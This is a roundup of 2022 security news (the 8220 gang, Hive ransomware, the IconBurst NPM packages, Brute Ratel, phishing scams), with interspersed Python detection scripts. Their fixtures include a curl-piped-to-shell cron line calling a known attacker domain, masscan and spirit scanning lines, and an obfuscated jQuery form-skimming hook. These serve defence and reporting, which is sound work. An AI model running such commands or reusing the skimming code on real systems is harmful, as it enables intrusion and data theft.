
Microsoft Warns of '8220 Group' Targeting Linux Servers

 

Microsoft Security Intelligence experts have issued a new warning about a known cloud threat actor (TA) group, dubbed 8220, that is targeting Linux servers to install crypto miners. 

“We observed notable updates to the long-running malware campaign targeting Linux systems by a group known as the 8220 gang. The updates include the deployment of new versions of a crypto miner and an IRC bot, as well as the use of an exploit for a recently disclosed vulnerability,” the technology giant wrote in a series of tweets. 

According to Cisco's Talos Intelligence group, the 8220 gang has been operating since at least 2017 and focuses primarily on crypto-mining campaigns. The threat actors are Chinese-speaking; the group's name comes from port 8220, which the miner uses to communicate with its C2 servers. 

Over the past year, the group has actively upgraded its methods and payloads. In a recent campaign, the group targeted i686 and x86_64 Linux systems and used RCE exploits for CVE-2022-26134 (Atlassian Confluence) and CVE-2019-2725 (Oracle WebLogic) for initial access, Microsoft researchers stated. 

Once access to a target system is secured, an evasive loader is downloaded from jira[.]letmaker[.]top. The loader eludes detection by clearing log files and disabling cloud monitoring and security tools. 

Next, the loader downloads the pwnRig crypto miner and an IRC bot that runs commands from a command-and-control (C2) server. It then maintains persistence by creating either a cron job or a script that runs every 60 seconds under nohup. 

“The loader uses the IP port scanner tool ‘masscan’ to find other SSH servers in the network and then uses the GoLang-based SSH brute force tool ‘spirit’ to propagate. It also scans the local disk for SSH keys to move laterally by connecting to known hosts.” 
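The loader behaviours described above (a fetch-and-run cron job, a nohup-wrapped script on a 60-second loop, masscan and spirit running on the host) are the kind of thing a host triage script can look for. The following is an added example, not Microsoft's detection logic; it assumes `ps -eo pid,args`-style output with a header line, the crontab and process listings are constructed samples, and the only page-derived indicators are the download domain (un-defanged here) and the two tool names from the Microsoft quote.

```python
"""Host triage helper for the 8220-style behaviours described above.
Added example; the crontab and ps samples are constructed, not real captures."""
import re
from dataclasses import dataclass, field

# Indicators from the article. The domain is printed defanged there, so undo that.
KNOWN_DOMAINS = {"jira[.]letmaker[.]top".replace("[.]", ".")}
SUSPECT_TOOLS = {"masscan", "spirit"}  # port scanner and SSH brute-forcer named by Microsoft

# Generic loader/persistence tells: fetch-and-pipe-to-shell, nohup, 60-second loops.
DOWNLOAD_PIPE = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")
NOHUP = re.compile(r"\bnohup\b")
SLEEP_LOOP = re.compile(r"\bsleep\s+60\b")


@dataclass
class Finding:
    source: str           # "cron" or "proc"
    line: str             # the offending line, verbatim
    reasons: list = field(default_factory=list)


def suspicious_reasons(cmd: str) -> list:
    """Return the list of heuristics a command line trips (empty if none)."""
    low = cmd.lower()
    reasons = [f"known domain {d}" for d in KNOWN_DOMAINS if d in low]
    reasons += [f"suspect tool {t}" for t in sorted(SUSPECT_TOOLS)
                if re.search(rf"(^|[\s/]){t}\b", low)]
    if DOWNLOAD_PIPE.search(low):
        reasons.append("download piped to shell")
    if NOHUP.search(low):
        reasons.append("nohup wrapper")
    if SLEEP_LOOP.search(low):
        reasons.append("60-second sleep loop")
    return reasons


def audit_crontab(text: str) -> list:
    """Scan crontab text (five-field or @-shortcut format) for suspicious jobs."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue                      # blank, comment, or VAR=value line
        if line.startswith("@"):          # @reboot, @hourly, ...
            parts = line.split(None, 1)
            schedule = parts[0]
            cmd = parts[1] if len(parts) > 1 else ""
        else:                             # five time fields, then the command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            schedule, cmd = " ".join(parts[:5]), parts[5]
        reasons = suspicious_reasons(cmd)
        if reasons and schedule == "* * * * *":
            reasons.append("scheduled every minute")
        if reasons:
            findings.append(Finding("cron", line, reasons))
    return findings


def audit_processes(ps_text: str) -> list:
    """Scan `ps -eo pid,args`-style output (header line first) for suspect commands."""
    findings = []
    for raw in ps_text.splitlines()[1:]:
        parts = raw.strip().split(None, 1)
        if len(parts) < 2:
            continue
        reasons = suspicious_reasons(parts[1])
        if reasons:
            findings.append(Finding("proc", raw.strip(), reasons))
    return findings


# Constructed samples: one benign job, one loader-style job, one nohup wrapper.
SAMPLE_CRONTAB = """\
PATH=/usr/local/bin:/usr/bin:/bin
# nightly certificate renewal (benign)
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * (curl -fsSL http://jira.letmaker.top/x.sh || wget -q -O- http://jira.letmaker.top/x.sh) | sh
@reboot nohup /tmp/.X11/run.sh >/dev/null 2>&1 &
"""

SAMPLE_PS = """\
  PID COMMAND
    1 /sbin/init
  842 /usr/sbin/sshd -D
 1337 /tmp/.X11/masscan -p22 10.0.0.0/8 --rate 10000
 1338 sh -c while true; do /tmp/.X11/spirit -f hosts.txt; sleep 60; done
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB) + audit_processes(SAMPLE_PS):
        print(f"[{f.source}] {f.line}\n    -> {'; '.join(f.reasons)}")
```

The tool-name and sleep-loop checks are deliberately loose triage heuristics (a legitimate package whose binary happens to be called `spirit` would also trip them); the point is to surface candidates for a human to review, not to block on its own.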

To guard networks against this threat, Microsoft urged organizations to secure systems and servers, apply updates, and use good credential hygiene. “Microsoft Defender for Endpoint on Linux detects malicious behaviors and payloads related to this campaign.” 

The findings come after Akamai disclosed that the Atlassian Confluence vulnerability is still seeing a steady 20,000 exploitation attempts per day, launched from nearly 6,000 IPs. These figures nevertheless represent a substantial decline from the peak of 100,000 the company observed when the bug was disclosed on June 02, 2022.

Hive Gang Changes Programming from Go to Rust

About Hive Ransomware

Microsoft Security researchers have found new versions of Hive ransomware written in Rust; earlier versions were written in the Go programming language. Hive surfaced in June 2021 and was flagged by the FBI in August. In November, MediaMarkt, a European electronics retailer, was hit by Hive. 

Hive is a double-extortion ransomware-as-a-service (RaaS) operation that has recently exploited vulnerable Microsoft Exchange servers, compromised VPN credentials, phishing, and exposed RDP servers to install the ransomware and steal information that can later be leaked. 

Why the change from Go to Rust

Hive's move to Rust has been underway for some time, and it follows the lead of BlackCat ransomware, which is also written in Rust. In March, researchers from Group-IB discovered that Hive had switched its Linux encryptor (used against VMware ESXi servers) to Rust in order to make it harder for security researchers to monitor ransom negotiations with victims. 

The rewrite amounts to far more than a port. The Microsoft Threat Intelligence Center said in its blog that "the upgrades in the latest variant [of Hive] are effectively an overhaul: the most notable changes include a full code migration to another programming language and the use of a more complex encryption method." 

What is the impact

The implications of these updates are far-reaching. Hive is a RaaS payload that Microsoft has seen used in attacks against organizations in the software and healthcare industries by major ransomware actors such as DEV-0237. 

Microsoft has pointed to several advantages of Rust over other languages that make it popular with developers, such as good cryptographic library support and stronger memory safety. 

Following are the benefits of Rust language, as per Microsoft: 

  • It offers memory, data type, and thread safety 
  • It has deep control over low-level resources 
  • It has a user-friendly syntax 
  • It has several mechanisms for concurrency and parallelism, thus enabling fast and safe file encryption 
  • It has a good variety of cryptographic libraries 
  • It's relatively more difficult to reverse-engineer 

ZDNet reports: "Microsoft found that the new ransom note differs from the one used in older variants. The new note instructs victims: 'Do not delete or reinstall VMs. There will be nothing to decrypt' and 'Do not modify, rename or delete *.key files. Your data will be undecryptable.' The *.key files are the files that Hive has encrypted."

Attack Against NPM Software Supply Chain Unearthed

 

The most recent IconBurst attack is described as a large and well-planned effort to spread malicious JavaScript packages through the open-source NPM package registry.

Further analysis turned up evidence of a planned supply chain attack, with numerous NPM packages containing jQuery scripts built to steal data from the deployed applications that use them, according to researchers.

ReversingLabs noted that the malicious packages it identified are probably used by hundreds or thousands of downstream mobile and desktop applications as well as websites, even though the full scope of the attack is still unknown. In one instance, a malicious package had been downloaded more than 17,000 times.

Obfuscation used 

The firm said that its analysis of the modules had found signs of coordination, with malicious modules linked to a select group of NPM publishers and recurrent patterns in the infrastructure that supported them, such as unencrypted domains.

“The revelation of a javascript obfuscator was the first trigger for our team to examine a broad variety of NPM packages, the majority of which had been released within the previous two months and utilized the stated obfuscator. It revealed more than 20 NPM packages in total. When these NPM modules are examined in greater detail, it becomes clear that they are associated with one of a small number of NPM accounts with names like ionic-io, arpanrizki, kbrstore, and aselole,” according to ReversingLabs. 

Meanwhile, Checkmarx said, "Roughly a thousand unique user accounts released over 1200 NPM packages to the registry, which we found. Automation was used, which allowed for the successful completion of the NPM 2FA challenge. At this moment, this collection of packages appears to be a part of an attacker's testing." 

Obfuscated malware data theft 

Thorough analysis of the de-obfuscated samples showed that every one of them collects form data using jQuery Ajax methods and then exfiltrates that data to various domains controlled by the malicious authors.

To exfiltrate serialized form data to attacker-controlled domains, the malicious packages use a modified script that extends the jQuery ajax() function. Before transmitting the data, the function checks the page URL as a form of target filtering. 
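A downstream project can screen its dependencies for the combination of tells this section describes: a publisher account from the list ReversingLabs named, obfuscated bundled code, a hooked `jQuery.ajax` next to form serialisation, and hard-coded external hosts. The script below is an added example of such a pre-install audit and is not ReversingLabs' or Checkmarx's tooling. It assumes the `_0x`-style hex identifiers emitted by the widely used javascript-obfuscator tool are what the quoted "javascript obfuscator" refers to (the article does not name it), and both the package.json documents and the bundled sources are constructed fixtures using the reserved `.invalid` TLD.

```python
"""Dependency audit for the IconBurst-style tells described above.
Added example; the package.json documents and bundled sources are constructed."""
import json
import re

# Publisher accounts named in the ReversingLabs quote above.
WATCHLIST_PUBLISHERS = {"ionic-io", "arpanrizki", "kbrstore", "aselole"}

# Obfuscation tells. _0x-prefixed hex identifiers are what the javascript-obfuscator
# tool emits by default (assumption: the article does not name the obfuscator used).
OBFUSCATION_PATTERNS = {
    "hex identifiers": re.compile(r"\b_0x[0-9a-f]{4,}\b"),
    "dynamic code": re.compile(r"\b(eval|Function)\s*\("),
    "string decoding": re.compile(r"\b(atob|unescape|String\.fromCharCode)\s*\("),
}
# Form-harvesting tells: jQuery.ajax replaced or hooked, plus form serialisation.
# (A hook installed through a computed key like jQuery[_0x..[0]] evades AJAX_HOOK;
# the obfuscation score is what catches that variant.)
AJAX_HOOK = re.compile(r"(\$|jQuery)\s*(\.ajax|\[\s*['\"]ajax['\"]\s*\])\s*=")
AJAX_PREFILTER = re.compile(r"\.ajax(Prefilter|Setup)\s*\(")
FORM_SERIALIZE = re.compile(r"\.serialize(Array)?\s*\(")
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def publishers_of(package_json: str) -> set:
    """Collect author and maintainer names from a package.json document."""
    meta = json.loads(package_json)
    names = set()
    for person in [meta.get("author")] + list(meta.get("maintainers", [])):
        if isinstance(person, str):              # "Name <email> (url)" form
            names.add(person.split("<")[0].strip())
        elif isinstance(person, dict) and person.get("name"):
            names.add(person["name"])
    return names


def audit_package(package_json: str, source: str, allowed_hosts=()) -> dict:
    """Score one package; returns {"name": ..., "reasons": [...]} (empty reasons = clean)."""
    reasons = []
    hits = publishers_of(package_json) & WATCHLIST_PUBLISHERS
    if hits:
        reasons.append("publisher on watchlist: " + ", ".join(sorted(hits)))
    obf = [name for name, rx in OBFUSCATION_PATTERNS.items() if rx.search(source)]
    if len(obf) >= 2:                            # a single tell alone is too noisy
        reasons.append("obfuscation: " + ", ".join(obf))
    hooked = bool(AJAX_HOOK.search(source) or AJAX_PREFILTER.search(source))
    if hooked and FORM_SERIALIZE.search(source):
        reasons.append("jQuery ajax hooked and form data serialised")
    hosts = {h.lower() for h in URL_HOST.findall(source)} - set(allowed_hosts)
    if hosts and (hooked or obf):                # plain URLs in clean code are fine
        reasons.append("external hosts: " + ", ".join(sorted(hosts)))
    return {"name": json.loads(package_json)["name"], "reasons": reasons}


def audit_packages(packages, allowed_hosts=()) -> list:
    """packages: iterable of (package_json_text, bundled_source_text); returns only hits."""
    results = (audit_package(pj, src, allowed_hosts) for pj, src in packages)
    return [r for r in results if r["reasons"]]


# Constructed fixtures. Nothing here is a real package or a real collector host.
BENIGN_PKG = json.dumps({"name": "pad-left-ish", "version": "1.0.0",
                         "author": "Jane Maintainer <jane@example.com>"})
BENIGN_SRC = "module.exports = function pad(s, n) { return s.padStart(n); };"

SUSPECT_PKG = json.dumps({"name": "icon-package-lookalike", "version": "0.0.3",
                          "author": {"name": "kbrstore"}})
SUSPECT_SRC = (
    "var _0x3a7c=['ajax','serialize'];"
    "jQuery['ajax']=function(){var d=$('form').serialize();"
    "var u=atob('Li4u');/* ... */};"
    "var fallback='https://collector.example.invalid/c';"
)

if __name__ == "__main__":
    for hit in audit_packages([(BENIGN_PKG, BENIGN_SRC), (SUSPECT_PKG, SUSPECT_SRC)]):
        print(hit["name"], "->", "; ".join(hit["reasons"]))
```

Run it against the `package.json` and the main file of each entry under `node_modules/` in CI, with the project's own API hosts passed as `allowed_hosts`, and treat any hit as a block on the build until someone has read the package.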

Attack on supply chain 

The NPM modules which ReversingLabs found have been downloaded more than 27,000 times in total. The attacks occurred for months before coming to attention because very few development firms can identify malicious software within open source libraries and modules.

"It is certain from the report of this study that software development businesses and their clients both require new tools and procedures for evaluating supply chain risks, such as those posed by these malicious NPM packages," the researchers said.

"Applications and services are only as secure as their weakest component due to the decentralized and modular nature of application development. The attack's success—more than two dozen malicious modules were made available for download on a well-known package repository, and one of them received 17,000 downloads in just a few weeks—underscores the lax standards for application development and the low barriers that prevent malicious or even vulnerable code from exploiting IT environments and sensitive applications," ReversingLabs further added.

Hackers Using 'Brute Ratel C4' Red-Teaming Tool to Evade Detection

 

Palo Alto Networks’ Unit 42 security researchers have found that Russian state-sponsored hackers are abusing Brute Ratel C4 (BRc4), the latest red-teaming and adversary-simulation/penetration-testing toolkit, in active attacks in an attempt to stay under the radar and evade detection.

Unit 42 reported that a malware sample uploaded to VirusTotal on May 19, 2022 contained a payload associated with Brute Ratel C4, a relatively new advanced toolkit designed to evade endpoint detection and response (EDR) and antivirus (AV) products. 

“The sample contained a malicious payload associated with Brute Ratel C4 (BRc4), the newest red-teaming and adversarial attack simulation tool to hit the market. While this capability has managed to stay out of the spotlight and remains less commonly known than its Cobalt Strike brethren, it is no less sophisticated. Instead, this tool is uniquely dangerous in that it was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. Its effectiveness at doing so can clearly be witnessed by the aforementioned lack of detection across vendors on VirusTotal,” Palo Alto Networks said in its blog. 

Unit 42's threat intelligence team believes the malicious actors are targeting entities worldwide, with their primary targets in South and North America. 

The researchers issued a warning in which they urged the cybersecurity fraternity to investigate the attack and look in-depth for any sign of malware, including the BRc4 tool. 

Researchers found that the tactics used with the malicious payloads resemble those of APT29 (Advanced Persistent Threat group 29), also known as The Dukes or Cozy Bear. Cozy Bear is a Russian state-sponsored group that was previously involved in the devastating SolarWinds attacks in 2020.

This commercial software was released in 2020 and has since gained over 480 licenses across 350 customers. BRc4 has a wide variety of features: process injection, screenshot capture, automation of adversary TTPs, file upload and download, support for multiple command-and-control channels, and the ability to keep memory artifacts concealed from anti-malware engines.

Ukrainian Authorities Take Down Phishing Gang That Siphoned 100 Million Hryvnias

 

The Ukraine Cyber Police Department and the Pechersk Police Department arrested nine members of a cybercriminal organization that defrauded over 5,000 citizens of Ukraine of more than 100 million hryvnias (about $3.39 million) via phishing attacks. 

The fraudsters designed more than 400 phishing sites for exfiltrating the banking details of Ukrainian citizens under the guise of social security payments from E.U. countries. The malicious landing pages were hosting an application form to fill out to receive financial help from the European Union. 

Some of the phishing sites registered by the hackers included ross0.yolasite[.]com, foundationua[.]com, ua-compensation[.]buzz, www.bless12[.]store, help-compensation[.]xyz, newsukraine10.yolasite[.]com, and euro24dopomoga0.yolasite[.]com, among others. 

“Nine people created and administered more than 400 fake web resources for obtaining banking data of citizens. Through the websites, Ukrainians were offered to form an application for the payment of financial assistance from the countries of the European Union. Using phishing links, victims took surveys and entered bank card details.” reads the advisory published by the Ukrainian Cyber Police. 

Once in possession of the bank details, the malicious hackers carried out unauthorized access to the victim’s online banking and siphoned money from their accounts. The hackers defrauded more than 5,000 citizens, stealing a total amount of more than 100 million hryvnias. 

The law enforcement operation culminated in the seizure of computer equipment, mobile phones, and bank cards as well as the criminal proceeds illicitly obtained through unlawful activities. If the arrested individuals are found guilty of fraud charges under the Criminal Code of Ukraine, they face up to 15 years in prison. 

“Criminal proceedings have been opened under Part 3 of Art. 190 (Fraud), Part 5 of Art. 361 (Unauthorized interference in the work of information (automated), electronic communication, information and communication systems, electronic communication networks) of the Criminal Code of Ukraine. Perpetrators may face up to fifteen years in prison,” the advisory further reads. “The issue of declaring suspicion and selecting preventive measures for the persons involved is being resolved.” 

The local police warned citizens to receive information regarding financial payments only from official sources, avoid clicking on suspicious links, and never provide private and banking information to third parties posing as government organizations.

Fraudulent UK Visa Scams Circulate on WhatsApp


According to a Malwarebytes report, individuals working in the UK are being scammed by a recent phishing campaign on WhatsApp. 

Scammers claim in a WhatsApp message that users who are willing to relocate to the UK for work will be eligible for a free visa as well as other perks. 

Bogus scam message 

Scam operators are disseminating information under the pretext of the UK government, promising a free visa and other advantages to anyone who wants to migrate there. The chosen candidates would be given travel and lodging expenses as well as access to medical facilities. 

The fraud begins with the message being sent in bulk to targets over WhatsApp. Users are told that the UK is running a recruitment drive with more than 186,000 open job positions because the country will need more than 132,000 additional workers by the year 2022. 

The objective of the scam 

When a victim clicks the scam link, they are shown a malicious domain made to look like the UK Visas and Immigration website. The page urges foreign nationals to "Apply for thousands of jobs already available in the United Kingdom."

The website's goal is to collect victims' names, email addresses, phone numbers, marital statuses, and employment statuses. 

Any information entered into the free application form is instantly 'accepted,' and the user is informed that they "will be provided a work permit, visa, plane tickets, and housing in the UK for free" according to a Malwarebytes report. 


Report fake WhatsApp messages

Users have the option to Report and Block on WhatsApp if they get a message from someone who is not on their contact list. One should disregard these spam communications and use the report button to file a complaint. Additionally, users can block these contacts in order to stop getting future scam messages from them.

Visa-themed phishing is a common tactic among cybercriminals. Similar hoaxes have circulated several times in the past to lure people looking to work or study abroad.


UK Councils and Hospitals Have Weak Cyber Security, Prone to Cyber Attacks

Weak Cybersecurity Spending

A cybersecurity investigation into UK public services revealed huge inconsistencies in defence spending, hundreds of flaws in websites, and staff email addresses and passwords. All of these were found at a single council, and the full details had been posted online. 

The ITV News investigation revealed that one UK council spent a mere €32,000 per year on cybersecurity. By comparison, another, smaller council had an annual cybersecurity budget of €1m, 30 times more. 

What are the findings

The investigation also disclosed that a hospital had just €10,000 per year for cybersecurity. The investigation hasn't disclosed the names of the public institutions. 

“Realistic funding, along with the right strategies, is vital to safeguard employees and members of the public. Public sector organizations must take steps to not only raise awareness of new and emerging cyber threats but also provide effective security training and support. 

“By equipping and empowering employees with the knowledge and know-how to spot and avoid attacks, the UK’s local authorities will be able to remain one step ahead. This isn’t just about technical defenses; it’s about supporting people in their day-to-day lives,” said Oz Alashe, CEO and founder of CybSafe. 

According to ITV News, the problems that cyber-attacks have caused include: 

  • Overpriced tax bills 
  • Cancelled hospital operations 
  • Incorrect benefit payments 
  • People forced to vacate their homes 
  • House sales falling through 
  • Inability to apply for council housing 
  • Private data leaked online 
  • Council house repairs not carried out 

The investigation mentioned that experts informed ITV News of their concerns about the lack of understanding and standards for public services related to cybersecurity. In 2021, Gloucester City Council's servers were attacked by Russian threat actors. 

In June, the city council's IT systems were still not functioning, and the authorities had set aside €380,000 to fix and recover from the incident. The council was attacked in October 2021. Separately, officials say that 33,645 data breaches caused by human error occurred at UK councils over the last five years. 

According to InfoSecurity "the data, obtained following a Freedom of Information (FoI) request sent by VPNOverview to 103 county councils in the UK, broke down the number of breaches suffered by each body. The local authority with the worst record for human-caused data breaches was Hampshire County Council, with 3759 incidents since 2016. This included 902 breaches in the year 2018/19. Gloucestershire County Council had the next worst record, suffering 2723 breaches in this period. It also experienced the largest increase from 2016/17 (90) to 2020/21 (1004) of any UK council, a rise of 1016%."

US Eye Clinic Suffers Data Breach, 92,000 Patients Hit

 

Mattax Neu Prater Eye Center, a healthcare clinic based in Missouri, US, has suffered a cyber attack. The center announced the breach at the end of June, although the attack took place in December 2021. It has informed US regulators of a data breach affecting more than 92,000 individuals.

“This incident has affected eye care practices across the country, and is not specific to Mattax Neu Prater. This data security incident occurred entirely within Eye Care Leaders’ network environment, and there were no other remedial actions available to Mattax Neu Prater,” the center added. 

Mattax Neu Prater Eye Center is a premier provider of advanced laser vision correction, such as LASIK, as well as cataract correction and advanced technology replacement lenses in Springfield, Missouri US. It provides surgical and non-surgical care and has reported that the “third-party data security incident” may have compromised the sensitive data of patients. 

“However, a lack of available forensic evidence prevented Eye Care Leaders from ruling out the possibility that some protected health information and personally identifiable information may have been exposed to the bad actor,” the clinic added. 

Further, Mattax Neu Prater said that at present the firm does not hold any evidence of identity theft as a result of the incident, but following the attack, the clinic has informed its patients who might be impacted via postal mail. 

Cybersecurity experts suggest that all healthcare organizations adopt a zero-trust approach to their digital infrastructure. This approach treats every connected device as a potential intruder until it has been properly verified. According to the experts, old-school approaches such as firewalls and antivirus software have become less effective. 

Cybersecurity researchers also believe that the best way to protect systems is to eliminate passwords altogether. Some other cybersecurity tips that can help healthcare professionals are given below:

• Store patient data on systems that are not connected to the internet. 
• Train staff on phishing attacks and how they work. 
• Use two-factor or multi-factor authentication (e.g., biometrics) for logins instead of passwords.
• Never click links in email or download attachments. 
• Encrypt all data so that, if it is accessed or compromised, it will not be exposed.

HackerOne Employee Stole Data From Bug Bounty Reports for Financial Advantages

 

HackerOne has disclosed details about a former employee who, it alleges, accessed company data for personal financial gain. The individual obtained information from security reports submitted to the bug bounty platform and attempted to disclose the same vulnerabilities outside of it. 

According to HackerOne, the employee had access to the data between April 4 and June 23, 2022. On June 22, 2022, HackerOne was alerted to the problem by a customer who had grown suspicious after receiving similar bug reports from the platform and from the individual. 

“This is a clear violation of our values, our culture, our policies, and our employment contracts,” the platform stated. 

“In under 24 hours, we worked quickly to contain the incident by identifying the then-employee and cutting off access to data. We have since terminated the employee, and further bolstered our defences to avoid similar situations in the future.” 

According to HackerOne, the submitter of this off-platform disclosure "reportedly used intimidating language in conversation with our customer," and the actor's intent was to collect more bounties. HackerOne also stated that, after consulting with lawyers, it will determine if a criminal referral of this situation is necessary. 

A HackerOne spokesperson informed The Daily Swig: “Since the founding of HackerOne, we have honoured our steadfast commitment to disclosing security incidents because we believe that sharing security information is essential to building a safer internet. 

“At HackerOne, we value the trusted relationships with our customers and the hacking community. It’s important for us to continue to demonstrate transparency as a core tenet of Corporate Security Responsibility and therefore shared this Incident Report.” 

The spokesperson added: “Our Code of Conduct sets the foundation for building trust. We will continue to prioritize coordinated disclosure and to act fast to ensure we uphold these strong standards.”

Crypto Scam to be Investigated by British Army

 

On Sunday, the UK Ministry of Defence confirmed that the British Army’s YouTube and Twitter accounts had been hacked, with the hackers using both handles to promote cryptocurrency scams. At present, the Ministry has not confirmed the exact dates of the takeover, and both accounts appear to be back to normal. 

“We are aware of a breach of the Army’s Twitter and YouTube accounts and an investigation is underway. The Army takes information security extremely seriously and is resolving the issue. Until the investigation is complete it would be inappropriate to comment further,” The Ministry of Defence Press Office said on Twitter. 

Malicious actors took control of the British Army’s Twitter page, swapping out the organization’s profile picture, bio, and cover photo to make it appear associated with The Possessed NFT collection, and used it to promote crypto giveaway schemes. Meanwhile, its YouTube channel aired livestreams featuring clips of Elon Musk, Jack Dorsey, and Ark CEO Cathie Wood discussing cryptocurrency, which directed users to crypto scam websites. 

The clips feature the promotion of “double your money” Bitcoin and Ethereum scams. According to Web3 is Going Great, a similar scheme took place in May. However, it is unclear which group is behind this campaign. 

The malicious actors changed the army’s verified Twitter account name to The Possessed, a project involving a collection of 10,000 animated NFTs with a price floor of 0.58 Ethereum (approximately $1,063). 

According to the Ministry, it is possible that the hack is part of a broader campaign to leverage the recent popularity of The Possessed. On Saturday, the project’s official Twitter handle notified its followers of another verified account that had also been hacked to promote an NFT scam using The Possessed brand. 

“The breach of the Army’s Twitter and YouTube accounts that occurred earlier today has been resolved and an investigation is underway. The Army takes information security extremely seriously and until their investigation is complete it would be inappropriate to comment further,” the UK Ministry of Defence Press Office tweeted later.

Google Announces Password Manager Updates to Enhance User Security

 

Last week, Google updated its Password Manager service, aimed at users who have been having trouble with their passwords. 

Chrome users can now use Google Password Manager's autofill option to have the browser remember passwords for all the sites they visit, the company said in a blog post. 

Earlier, users were allowed to add passwords to Google Password Manager only when Google used to prompt the user to enter the password; now, they can manually add passwords at any time. 

Although Google is not yet comfortable with making Password Manager a standalone app, users on Android can now add a shortcut to it on the home screen. Customers can use their iPhones to generate unique, strong passwords for their apps when they opt for Chrome as the default autofill provider. 

Additionally, the built-in Password Checkup feature on Android is receiving an upgrade of its own too. Beyond checking for hacked credentials, it can further highlight weak and reused passwords à la Apple iOS. Google is also expanding the compromised password warnings to Chrome users across all operating systems. 
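The three checks Password Checkup is described as performing (breached, weak, and reused credentials) can be illustrated locally. The script below is an added example and is not Google's implementation: for the breach check it uses the SHA-1 hash-prefix range query (k-anonymity) scheme popularised by the Pwned Passwords API, whereas Google's checker uses its own privacy-preserving protocol. The vault entries and the breached-password corpus are constructed stand-ins.

```python
"""Local password-hygiene check of the kind Password Checkup performs.
Added example; the vault entries and breach corpus are constructed."""
import hashlib
from collections import defaultdict

# Constructed vault: (site, password). Not real credentials.
VAULT = [
    ("mail.example.com", "Tr0ub4dor&3"),
    ("shop.example.net", "Tr0ub4dor&3"),              # reused
    ("forum.example.org", "password"),                # weak and breached
    ("bank.example.com", "correct horse battery staple"),
]

# Constructed stand-in for a breached-password corpus, indexed the way the
# Pwned Passwords range API is: upper-case SHA-1 hex split into a 5-char prefix and suffix.
_BREACHED = ["password", "123456", "qwerty", "letmein"]
BREACH_INDEX = defaultdict(dict)
for _pw in _BREACHED:
    _h = hashlib.sha1(_pw.encode()).hexdigest().upper()
    BREACH_INDEX[_h[:5]][_h[5:]] = 1        # prefix -> {suffix: seen-count}


def range_query(prefix: str) -> dict:
    """Server side of a k-anonymity lookup: the client sends only five hex chars
    and receives every suffix under that prefix, so the server never learns the
    full hash, let alone the password. With a real corpus each prefix covers
    hundreds of suffixes; this toy index is too small for that to show."""
    return dict(BREACH_INDEX.get(prefix.upper(), {}))


def is_breached(password: str) -> bool:
    h = hashlib.sha1(password.encode()).hexdigest().upper()
    return h[5:] in range_query(h[:5])      # the comparison happens client-side


def is_weak(password: str, min_len: int = 12) -> bool:
    """Length floor plus a small deny-list; real checkers use far larger lists."""
    return len(password) < min_len or password.lower() in set(_BREACHED)


def check_vault(entries) -> dict:
    """Map each site with a problem to its list of issues (reused/weak/breached)."""
    sites_by_password = defaultdict(list)
    for site, pw in entries:
        sites_by_password[pw].append(site)
    report = {}
    for site, pw in entries:
        issues = []
        others = [s for s in sites_by_password[pw] if s != site]
        if others:
            issues.append("reused on " + ", ".join(others))
        if is_weak(pw):
            issues.append("weak")
        if is_breached(pw):
            issues.append("breached")
        if issues:
            report[site] = issues
    return report


if __name__ == "__main__":
    for site, issues in check_vault(VAULT).items():
        print(f"{site}: {', '.join(issues)}")
```

The reuse check is the one users most often underestimate: a strong password shared across two sites is only as safe as the weaker site's database, which is why the report lists every other site the password appears on.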

Last but not least, Google is launching a new "Touch-to-Login" to Chrome on Android that allows users to sign in to websites with a single tap after entering the credentials with autofill. It's worth noting that Apple implemented a similar feature in Safari with iOS 12.2. 

According to Google's blog post, the latest updates and added features have been designed at the Google Safety Engineering Center, where the privacy and security experts work on creating a secured ecosystem for the customers. 

The blogpost further stated, “Of course, our efforts to create a safer web are a truly global effort – from our early work on 2-step verification to our future investments in technologies like passkeys – and these updates that we are rolling out over the next months are an important part of that work.” 

The announcement comes after Verizon’s 2022 Data Breach Investigations Report highlighted that compromised credentials accounted for almost 50% of data breaches.